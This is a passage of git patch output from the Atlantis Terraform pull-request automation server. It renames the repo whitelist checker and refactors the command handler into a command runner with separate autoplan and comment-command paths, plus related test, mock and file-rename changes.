"github.com/runatlantis/atlantis/testing" ) -func TestIsWhitelisted(t *testing.T) { +func TestRepoWhitelistChecker_IsWhitelisted(t *testing.T) { cases := []struct { Description string Whitelist string @@ -151,7 +151,7 @@ func TestIsWhitelisted(t *testing.T) { for _, c := range cases { t.Run(c.Description, func(t *testing.T) { - w := events.RepoWhitelist{Whitelist: c.Whitelist} + w := events.RepoWhitelistChecker{Whitelist: c.Whitelist} Equals(t, c.Exp, w.IsWhitelisted(c.RepoFullName, c.Hostname)) }) } diff --git a/server/events_controller.go b/server/events_controller.go index 95faa70299..3db62bd96e 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -45,8 +45,8 @@ type EventsController struct { // GitlabWebHookSecret is the secret added to this webhook via the GitLab // UI that identifies this call as coming from GitLab. If empty, no // request validation is done. - GitlabWebHookSecret []byte - RepoWhitelist *events.RepoWhitelist + GitlabWebHookSecret []byte + RepoWhitelistChecker *events.RepoWhitelistChecker // SupportedVCSHosts is which VCS hosts Atlantis was configured upon // startup to support. SupportedVCSHosts []models.VCSHostType @@ -159,7 +159,7 @@ const ClosedPullEvent = "closed" const OtherPullEvent = "other" func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) { - if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { + if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { // If the repo isn't whitelisted and we receive an opened pull request // event we comment back on the pull request that the repo isn't // whitelisted. 
This is because the user might be expecting Atlantis to @@ -254,7 +254,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. - if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { + if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { e.commentNotWhitelisted(baseRepo, pullNum) e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted") return diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index f1dc0958fa..7d9f300a72 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -293,7 +293,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, GithubRequestValidator: &server.DefaultGithubRequestValidator{}, GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, GitlabWebHookSecret: nil, - RepoWhitelist: &events.RepoWhitelist{ + RepoWhitelistChecker: &events.RepoWhitelistChecker{ Whitelist: "*", }, SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github}, diff --git a/server/events_controller_test.go b/server/events_controller_test.go index 9d35a22655..a7f5c81a69 100644 --- a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -177,10 +177,10 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) { Logger: logging.NewNoopLogger(), CommentParser: &events.CommentParser{}, GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, - Parser: &events.EventParser{}, - SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, - RepoWhitelist: &events.RepoWhitelist{}, - VCSClient: vcsClient, + Parser: &events.EventParser{}, + SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, + RepoWhitelistChecker: &events.RepoWhitelistChecker{}, + 
VCSClient: vcsClient, } requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json")) Ok(t, err) @@ -207,7 +207,7 @@ func TestPost_GithubCommentNotWhitelisted(t *testing.T) { CommentParser: &events.CommentParser{}, Parser: &events.EventParser{}, SupportedVCSHosts: []models.VCSHostType{models.Github}, - RepoWhitelist: &events.RepoWhitelist{}, + RepoWhitelistChecker: &events.RepoWhitelistChecker{}, VCSClient: vcsClient, } requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent_notWhitelisted.json")) @@ -325,7 +325,7 @@ func TestPost_GithubPullRequestInvalidRepo(t *testing.T) { func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) { t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400") e, v, _, p, _, _, _, _ := setup(t) - e.RepoWhitelist = &events.RepoWhitelist{Whitelist: "github.com/nevermatch"} + e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"} req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(githubHeader, "pull_request") @@ -424,7 +424,7 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab}, GitlabWebHookSecret: secret, GitlabRequestParserValidator: gl, - RepoWhitelist: &events.RepoWhitelist{ + RepoWhitelistChecker: &events.RepoWhitelistChecker{ Whitelist: "*", }, VCSClient: vcsmock, diff --git a/server/router.go b/server/router.go index af9319b987..4f4e2840da 100644 --- a/server/router.go +++ b/server/router.go @@ -9,7 +9,7 @@ import ( // Router can be used to retrieve Atlantis URLs. It acts as an intermediary // between the underlying router and the rest of Atlantis that might need to -// know URLs to different resources. +// construct URLs to different resources. type Router struct { // Underlying is the router that the routes have been constructed on. 
Underlying *mux.Router diff --git a/server/server.go b/server/server.go index 63bd77a83f..fe97620d53 100644 --- a/server/server.go +++ b/server/server.go @@ -262,7 +262,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { }, }, } - repoWhitelist := &events.RepoWhitelist{ + repoWhitelist := &events.RepoWhitelistChecker{ Whitelist: userConfig.RepoWhitelist, } locksController := &LocksController{ @@ -282,7 +282,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { GithubRequestValidator: &DefaultGithubRequestValidator{}, GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{}, GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret), - RepoWhitelist: repoWhitelist, + RepoWhitelistChecker: repoWhitelist, SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, From d3ec832effdff19a9d83df2c4ab07a20a9f8040c Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 18:18:54 +0100 Subject: [PATCH 40/69] WIP --- server/events/atlantis_workspace.go | 1 + server/events/atlantis_workspace_locker.go | 13 + server/events/command_context.go | 5 +- server/events/command_handler_test.go | 247 ------------------ ...{command_response.go => command_result.go} | 4 +- .../{command_handler.go => command_runner.go} | 155 +++++++---- server/events/command_runner_test.go | 239 +++++++++++++++++ server/events/comment_parser.go | 4 +- server/events/commit_status_updater.go | 12 +- server/events/commit_status_updater_test.go | 66 ++--- server/events/event_parser.go | 121 ++++++--- server/events/event_parser_test.go | 159 +++++++++-- server/events/executor.go | 2 +- server/events/markdown_renderer.go | 6 +- server/events/markdown_renderer_test.go | 175 ++++++++----- ...mmandresponse.go => events_commandname.go} | 10 +- .../mocks/matchers/events_commandresult.go | 20 ++ .../matchers/models_projectcommandcontext.go | 20 ++ 
.../mocks/matchers/ptr_to_events_command.go | 10 +- .../matchers/ptr_to_events_commentcommand.go | 20 ++ .../ptr_to_github_pullrequestevent.go | 20 ++ .../mocks/matchers/ptr_to_models_repo.go | 20 ++ .../slice_of_models_projectcommandcontext.go | 20 ++ server/events/mocks/mock_command_runner.go | 76 ++++-- .../mocks/mock_commit_status_updater.go | 44 ++-- server/events/mocks/mock_event_parsing.go | 83 +++++- server/events/mocks/mock_executor.go | 8 +- .../mocks/mock_project_command_builder.go | 175 +++++++++++++ .../mocks/mock_pull_request_operator.go | 154 ----------- server/events/models/models_test.go | 7 + ...operator.go => project_command_builder.go} | 148 +++++------ ...est.go => project_command_builder_test.go} | 0 ..._operator.go => project_command_runner.go} | 104 +++++--- ...test.go => project_command_runner_test.go} | 0 server/events/project_result.go | 8 +- ..._step_operator.go => apply_step_runner.go} | 6 +- ...ator_test.go => apply_step_runner_test.go} | 8 +- ...t_step_operator.go => init_step_runner.go} | 4 +- ...rator_test.go => init_step_runner_test.go} | 2 +- ...n_step_operater.go => plan_step_runner.go} | 6 +- ...rater_test.go => plan_step_runner_test.go} | 40 ++- ...l_operator.go => pull_approved_checker.go} | 4 +- .../events/runtime/run_step_operator_test.go | 3 - ...un_step_operator.go => run_step_runner.go} | 6 +- server/events/runtime/run_step_runner_test.go | 50 ++++ server/events/vcs/fixtures/fixtures.go | 8 + server/events/vcs/vcs_test.go | 19 ++ server/events_controller.go | 50 ++-- server/events_controller_e2e_test.go | 78 +++--- server/events_controller_test.go | 159 ++++++++--- server/router_test.go | 27 ++ server/server.go | 69 +++-- server/server_test.go | 1 + .../githubPullRequestClosedEvent.json | 32 +-- .../githubPullRequestOpenedEvent.json | 6 +- .../exp-output-apply-default.txt.act | 7 - .../tfvars-yaml/exp-output-autoplan.txt.act | 61 ----- 57 files changed, 1727 insertions(+), 1075 deletions(-) delete mode 100644 
server/events/command_handler_test.go rename server/events/{command_response.go => command_result.go} (89%) rename server/events/{command_handler.go => command_runner.go} (58%) create mode 100644 server/events/command_runner_test.go rename server/events/mocks/matchers/{events_commandresponse.go => events_commandname.go} (53%) create mode 100644 server/events/mocks/matchers/events_commandresult.go create mode 100644 server/events/mocks/matchers/models_projectcommandcontext.go create mode 100644 server/events/mocks/matchers/ptr_to_events_commentcommand.go create mode 100644 server/events/mocks/matchers/ptr_to_github_pullrequestevent.go create mode 100644 server/events/mocks/matchers/ptr_to_models_repo.go create mode 100644 server/events/mocks/matchers/slice_of_models_projectcommandcontext.go create mode 100644 server/events/mocks/mock_project_command_builder.go delete mode 100644 server/events/mocks/mock_pull_request_operator.go rename server/events/{pull_request_operator.go => project_command_builder.go} (62%) rename server/events/{pull_request_operator_test.go => project_command_builder_test.go} (100%) rename server/events/{project_operator.go => project_command_runner.go} (57%) rename server/events/{project_operator_test.go => project_command_runner_test.go} (100%) rename server/events/runtime/{apply_step_operator.go => apply_step_runner.go} (83%) rename server/events/runtime/{apply_step_operator_test.go => apply_step_runner_test.go} (95%) rename server/events/runtime/{init_step_operator.go => init_step_runner.go} (87%) rename server/events/runtime/{init_step_operator_test.go => init_step_runner_test.go} (97%) rename server/events/runtime/{plan_step_operater.go => plan_step_runner.go} (93%) rename server/events/runtime/{plan_step_operater_test.go => plan_step_runner_test.go} (87%) rename server/events/runtime/{approval_operator.go => pull_approved_checker.go} (67%) delete mode 100644 server/events/runtime/run_step_operator_test.go rename 
server/events/runtime/{run_step_operator.go => run_step_runner.go} (77%) create mode 100644 server/events/runtime/run_step_runner_test.go create mode 100644 server/events/vcs/vcs_test.go create mode 100644 server/router_test.go delete mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act delete mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index 06944bdae7..251adb7e34 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -35,6 +35,7 @@ type AtlantisWorkspace interface { // absolute path to the root of the cloned repo. Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) // GetWorkspace returns the path to the workspace for this repo and pull. + // If workspace does not exist on disk, error will be of type os.IsNotExist. GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) // Delete deletes the workspace for this repo and pull. Delete(r models.Repo, p models.PullRequest) error diff --git a/server/events/atlantis_workspace_locker.go b/server/events/atlantis_workspace_locker.go index 594ea08ab6..cc86db42c7 100644 --- a/server/events/atlantis_workspace_locker.go +++ b/server/events/atlantis_workspace_locker.go @@ -30,6 +30,8 @@ import ( type AtlantisWorkspaceLocker interface { // TryLock tries to acquire a lock for this repo, workspace and pull. TryLock(repoFullName string, workspace string, pullNum int) bool + // TryLock2 tries to acquire a lock for this repo, workspace and pull. + TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) // Unlock deletes the lock for this repo, workspace and pull. If there was no // lock it will do nothing. 
Unlock(repoFullName, workspace string, pullNum int) @@ -48,6 +50,17 @@ func NewDefaultAtlantisWorkspaceLocker() *DefaultAtlantisWorkspaceLocker { } } +func (d *DefaultAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) { + if !d.TryLock(repoFullName, workspace, pullNum) { + return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+ + " command that is running for this pull request–"+ + "wait until the previous command is complete and try again", workspace) + } + return func() { + d.Unlock(repoFullName, workspace, pullNum) + }, nil +} + // TryLock returns true if a lock is acquired for this repo, pull and workspace and // false otherwise. func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool { diff --git a/server/events/command_context.go b/server/events/command_context.go index f986e43cc3..49b0f07268 100644 --- a/server/events/command_context.go +++ b/server/events/command_context.go @@ -30,7 +30,6 @@ type CommandContext struct { HeadRepo models.Repo Pull models.PullRequest // User is the user that triggered this command. - User models.User - Command *Command - Log *logging.SimpleLogger + User models.User + Log *logging.SimpleLogger } diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go deleted file mode 100644 index 65bcf3c6f5..0000000000 --- a/server/events/command_handler_test.go +++ /dev/null @@ -1,247 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
-// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events_test - -import ( - "bytes" - "errors" - "log" - "strings" - "testing" - - "github.com/google/go-github/github" - . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/mocks" - "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/models/fixtures" - "github.com/runatlantis/atlantis/server/events/vcs" - vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" - logmocks "github.com/runatlantis/atlantis/server/logging/mocks" - . "github.com/runatlantis/atlantis/testing" -) - -var operator *mocks.MockPullRequestOperator -var eventParsing *mocks.MockEventParsing -var vcsClient *vcsmocks.MockClientProxy -var ghStatus *mocks.MockCommitStatusUpdater -var githubGetter *mocks.MockGithubPullGetter -var gitlabGetter *mocks.MockGitlabMergeRequestGetter -var workspaceLocker *mocks.MockAtlantisWorkspaceLocker -var ch events.CommandHandler -var logBytes *bytes.Buffer - -func setup(t *testing.T) { - RegisterMockTestingT(t) - operator = mocks.NewMockPullRequestOperator() - eventParsing = mocks.NewMockEventParsing() - ghStatus = mocks.NewMockCommitStatusUpdater() - workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker() - vcsClient = vcsmocks.NewMockClientProxy() - githubGetter = mocks.NewMockGithubPullGetter() - gitlabGetter = mocks.NewMockGitlabMergeRequestGetter() - logger := logmocks.NewMockSimpleLogging() - logBytes = new(bytes.Buffer) - When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0)) - ch = events.CommandHandler{ - VCSClient: vcsClient, - CommitStatusUpdater: ghStatus, - EventParser: eventParsing, - AtlantisWorkspaceLocker: workspaceLocker, - MarkdownRenderer: 
&events.MarkdownRenderer{}, - GithubPullGetter: githubGetter, - GitlabMergeRequestGetter: gitlabGetter, - Logger: logger, - AllowForkPRs: false, - AllowForkPRsFlag: "allow-fork-prs-flag", - PullRequestOperator: operator, - } -} - -func TestExecuteCommand_LogPanics(t *testing.T) { - t.Log("if there is a panic it is commented back on the pull request") - setup(t) - ch.AllowForkPRs = true // Lets us get to the panic code. - defer func() { ch.AllowForkPRs = false }() - When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, nil)).ThenPanic("panic") - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil) - _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() - Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") -} - -func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { - t.Log("if CommandHandler was constructed with a nil GithubPullGetter an error should be logged") - setup(t) - ch.GithubPullGetter = nil - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) -} - -func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { - t.Log("if CommandHandler was constructed with a nil GitlabMergeRequestGetter an error should be logged") - setup(t) - ch.GitlabMergeRequestGetter = nil - ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, 1, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) -} - -func TestExecuteCommand_GithubPullErr(t *testing.T) { - t.Log("if getting the github pull request fails an error should be logged") - setup(t) - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) - 
ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) -} - -func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { - t.Log("if getting the gitlab merge request fails an error should be logged") - setup(t) - When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) - ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) -} - -func TestExecuteCommand_GithubPullParseErr(t *testing.T) { - t.Log("if parsing the returned github pull request fails an error should be logged") - setup(t) - var pull github.PullRequest - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) - - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) - Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) -} - -func TestExecuteCommand_ForkPRDisabled(t *testing.T) { - t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + - " comment saying that this is not allowed") - setup(t) - ch.AllowForkPRs = false // by default it's false so don't need to reset - var pull github.PullRequest - modelPull := models.PullRequest{State: models.Open} - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - - headRepo := fixtures.GithubRepo - headRepo.FullName = "forkrepo/atlantis" - headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) - - 
ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, nil) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) -} - -func TestExecuteCommand_ClosedPull(t *testing.T) { - t.Log("if a command is run on a closed pull request atlantis should" + - " comment saying that this is not allowed") - setup(t) - pull := &github.PullRequest{ - State: github.String("closed"), - } - modelPull := models.PullRequest{State: models.Closed} - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) - - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") -} - -func TestExecuteCommand_WorkspaceLocked(t *testing.T) { - t.Log("if the workspace is locked, should comment back on the pull") - setup(t) - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmd := events.Command{ - Name: events.Plan, - Workspace: "workspace", - } - - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - msg := "The workspace workspace is currently locked by another" + - " command that is running for this pull request." + - " Wait until the previous command is complete and try again." 
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments() - Equals(t, msg, response.Failure) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, - "**Plan Failed**: "+msg+"\n\n") -} - -func TestExecuteCommand_FullRun(t *testing.T) { - t.Log("when running a plan, apply should comment") - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmdResponse := events.CommandResponse{} - for _, c := range []events.CommandName{events.Plan, events.Apply} { - setup(t) - cmd := events.Command{ - Name: c, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - switch c { - case events.Plan: - When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - case events.Apply: - When(operator.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - } - - ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments() - Equals(t, cmdResponse, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) - } -} - -func 
TestExecuteCommand_ForkPREnabled(t *testing.T) { - t.Log("when running a plan on a fork PR, it should succeed") - setup(t) - - // Enable forked PRs. - ch.AllowForkPRs = true - defer func() { ch.AllowForkPRs = false }() // Reset after test. - - var pull github.PullRequest - cmdResponse := events.CommandResponse{} - cmd := events.Command{ - Name: events.Plan, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - headRepo := fixtures.GithubRepo - headRepo.FullName = "forkrepo/atlantis" - headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - - ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments() - Equals(t, cmdResponse, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -} diff --git a/server/events/command_response.go b/server/events/command_result.go similarity index 89% rename from server/events/command_response.go rename to server/events/command_result.go index abba3897b4..ff767ddb58 100644 --- a/server/events/command_response.go +++ b/server/events/command_result.go @@ -13,8 +13,8 @@ // package events -// CommandResponse is the result of running a Command. 
-type CommandResponse struct { +// CommandResult is the result of running a Command. +type CommandResult struct { Error error Failure string ProjectResults []ProjectResult diff --git a/server/events/command_handler.go b/server/events/command_runner.go similarity index 58% rename from server/events/command_handler.go rename to server/events/command_runner.go index bfd25dd935..c54891e87e 100644 --- a/server/events/command_handler.go +++ b/server/events/command_runner.go @@ -29,10 +29,11 @@ import ( // CommandRunner is the first step after a command request has been parsed. type CommandRunner interface { - // ExecuteCommand is the first step after a command request has been parsed. + // RunCommentCommand is the first step after a command request has been parsed. // It handles gathering additional information needed to execute the command // and then calling the appropriate services to finish executing the command. - ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command) + RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand) + RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) } //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_github_pull_getter.go GithubPullGetter @@ -51,14 +52,13 @@ type GitlabMergeRequestGetter interface { GetMergeRequest(repoFullName string, pullNum int) (*gitlab.MergeRequest, error) } -// CommandHandler is the first step when processing a comment command. -type CommandHandler struct { +// DefaultCommandRunner is the first step when processing a comment command. 
+type DefaultCommandRunner struct { VCSClient vcs.ClientProxy GithubPullGetter GithubPullGetter GitlabMergeRequestGetter GitlabMergeRequestGetter CommitStatusUpdater CommitStatusUpdater EventParser EventParsing - AtlantisWorkspaceLocker AtlantisWorkspaceLocker MarkdownRenderer *MarkdownRenderer Logger logging.SimpleLogging // AllowForkPRs controls whether we operate on pull requests from forks. @@ -66,17 +66,50 @@ type CommandHandler struct { // AllowForkPRsFlag is the name of the flag that controls fork PR's. We use // this in our error message back to the user on a forked PR so they know // how to enable this functionality. - AllowForkPRsFlag string - PullRequestOperator PullRequestOperator + AllowForkPRsFlag string + ProjectCommandBuilder ProjectCommandBuilder + ProjectCommandRunner *ProjectCommandRunner } -// ExecuteCommand executes the command. -// If the repo is from GitHub, we don't use headRepo and instead make an API call -// to get the headRepo. This is because the caller is unable to pass in a -// headRepo since there's not enough data available on the initial webhook -// payload. 
-func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command) { +func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) { + log := c.buildLogger(baseRepo.FullName, pull.Num) + ctx := &CommandContext{ + User: user, + Log: log, + Pull: pull, + HeadRepo: headRepo, + BaseRepo: baseRepo, + } + runFn := func() ([]ProjectResult, error) { + projectCmds, err := c.ProjectCommandBuilder.BuildAutoplanCommands(ctx) + if err != nil { + return nil, err + } + var results []ProjectResult + for _, cmd := range projectCmds { + res := c.ProjectCommandRunner.Plan(cmd) + results = append(results, ProjectResult{ + ProjectCommandResult: res, + Path: cmd.RepoRelPath, + Workspace: cmd.Workspace, + }) + } + return results, nil + } + c.run(ctx, AutoplanCommand{}, runFn) +} + +// RunCommentCommand executes the command. +// We take in a pointer for maybeHeadRepo because for some events there isn't +// enough data to construct the Repo model and callers might want to wait until +// the event is further validated before making an additional (potentially +// wasteful) call to get the necessary data. 
+func (c *DefaultCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand) { log := c.buildLogger(baseRepo.FullName, pullNum) + var headRepo models.Repo + if maybeHeadRepo != nil { + headRepo = *maybeHeadRepo + } var err error var pull models.PullRequest @@ -97,13 +130,38 @@ func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Re Log: log, Pull: pull, HeadRepo: headRepo, - Command: cmd, BaseRepo: baseRepo, } - c.run(ctx) + + runFn := func() ([]ProjectResult, error) { + var result ProjectCommandResult + switch cmd.Name { + case Plan: + projectCmd, err := c.ProjectCommandBuilder.BuildPlanCommand(ctx, cmd) + if err != nil { + return nil, err + } + result = c.ProjectCommandRunner.Plan(projectCmd) + case Apply: + projectCmd, err := c.ProjectCommandBuilder.BuildApplyCommand(ctx, cmd) + if err != nil { + return nil, err + } + result = c.ProjectCommandRunner.Apply(projectCmd) + default: + ctx.Log.Err("failed to determine desired command, neither plan nor apply") + } + return []ProjectResult{{ + Path: cmd.Dir, + Workspace: cmd.Workspace, + ProjectCommandResult: result, + }}, nil + } + + c.run(ctx, cmd, runFn) } -func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) { +func (c *DefaultCommandRunner) getGithubData(baseRepo 